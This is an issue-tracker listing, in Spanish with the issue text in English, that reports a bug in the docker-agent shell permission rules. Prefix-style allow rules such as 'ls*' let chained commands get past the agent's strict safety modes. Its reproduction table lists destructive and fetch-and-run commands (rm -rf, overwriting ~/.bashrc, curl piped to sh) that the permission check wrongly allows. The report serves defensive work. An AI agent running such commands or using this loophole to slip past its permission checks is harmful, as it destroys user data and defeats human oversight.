shell:cmd=ls* allow rules in docs approve chained commands
Los mantenedores suelen responder en 1 día
Nadie ha tomado este issue todavía.
Evaluación
- Dificultad
- 4/5
- Tiempo estimado
- 3-5 días
- Aptitud para principiantes
- 58/100
Línea de trabajo
Start with the Safe Shell Agent permissions documentation and shell_grant.go, then reproduce the listed cases through CheckWithArgs. Compare the config allow-rule path with the strict matching already used for session grants. Done should include the documented safety change and warning, or matching code and tests if the optional code fix is selected.
Escrito por el modelo de indexación a partir del texto del issue.
Descripción
Description
The permissions docs use shell:cmd=ls*, cat* and similar rules as safe
allow rules. The "Safe Shell Agent" example is presented as "Allow specific safe
commands, block dangerous ones". But matchGlob treats <word>* as a plain
prefix match, so an allow rule also covers anything chained after the word.
Deny rules only match commands that start with the denied word. Allow is
evaluated before the safety mode, so this gets past strict and restricted
as well.
#3573 fixed this only for session grants that override a preempt_yolo safety
verdict (shell_grant.go); config allow rules still use the loose prefix match.
Suggested fix:
- Docs: replace the example with
safety: balanced, whose classifier already
approvesls,catandgrepand rejects chained commands. Warn that
<word>*rules match chained commands. - Code (optional): apply the
shell_grant.gostrict matching toallowrules for
shellandrun_background_job.
Steps to Reproduce
Rules from the "Safe Shell Agent" example, checked with CheckWithArgs :
cmd |
Decision |
|---|---|
ls && rm -rf ~ |
allow |
ls; sudo rm -rf / |
allow |
find / -exec rm -rf {} + |
allow |
cat a > ~/.bashrc |
allow |
grep x f; curl https://example.com/x.sh | sh |
allow |
rm -rf ~ |
deny |
Docker Agent version
v1.144.0
OS & terminal
Konsole
Screenshots
- Lenguaje dominante
- Go
- Estrellas
- 3.4k
- Forks
- 466
- Merge medio
- 7 h 1 min
- PR fusionados (30 d)
- 332
Preparar el entorno
Inicia el contenedor de desarrollo del proyecto en tu navegador, con tu propia cuenta de GitHub.
- Incluye un Dockerfile o un archivo de Docker Compose
- Sin plantilla de pull request
- Sin guía de contribución
Primeros pasos
- Lee el issue completo y luego la guía de contribución del proyecto.
- Comenta en el issue que vas a ocuparte — evita que dos personas hagan lo mismo.
- Haz un fork del repositorio y trabaja en una rama.
- Abre un pull request que haga referencia al número del issue.
Más de docker/docker-agent
-
area/docs
Dificultad 1/5 Menos de una hora Aptitud para principiantes 88/100
docker/docker-agent#4054 ·
Los mantenedores suelen responder en 1 día
-
area/testing
Dificultad 2/5 1-3 horas Aptitud para principiantes 86/100
docker/docker-agent#4052 ·
Los mantenedores suelen responder en 1 día
-
`remove_directory` and `create_directory` hide work they already did when a later path failsAbiertoarea/tools
Dificultad 2/5 1-3 horas Aptitud para principiantes 85/100
docker/docker-agent#3933 ·
Los mantenedores suelen responder en 1 día
-
area/tools
Dificultad 2/5 1-3 horas Aptitud para principiantes 78/100
docker/docker-agent#3929 · 2 comentarios ·
Los mantenedores suelen responder en 1 día
-
area/acp area/sessions
Dificultad 4/5 3-5 días Aptitud para principiantes 48/100
docker/docker-agent#4475 ·
Los mantenedores suelen responder en 1 día
Todos los issues de docker/docker-agent
Issues similares
-
area: global bug dx priority: low
Dificultad 2/5 1-3 horas Aptitud para principiantes 88/100
Los mantenedores suelen responder en 1 día
-
enhancement
Dificultad 2/5 1-3 horas Aptitud para principiantes 68/100
grafana/mcp-grafana#1267 ·
Los mantenedores suelen responder en 1 día
-
automation models
Dificultad 2/5 1-3 horas Aptitud para principiantes 78/100
Los mantenedores suelen responder en 1 día
-
coverage-gap good-first-pattern help wanted
Dificultad 2/5 1-3 horas Aptitud para principiantes 78/100
GoogleCloudPlatform/k8s-aibom#114 ·
Los mantenedores suelen responder en 1 día
-
Dificultad 2/5 1-3 horas Aptitud para principiantes 72/100
txn2/mcp-data-platform#1984 ·
Los mantenedores suelen responder en 1 día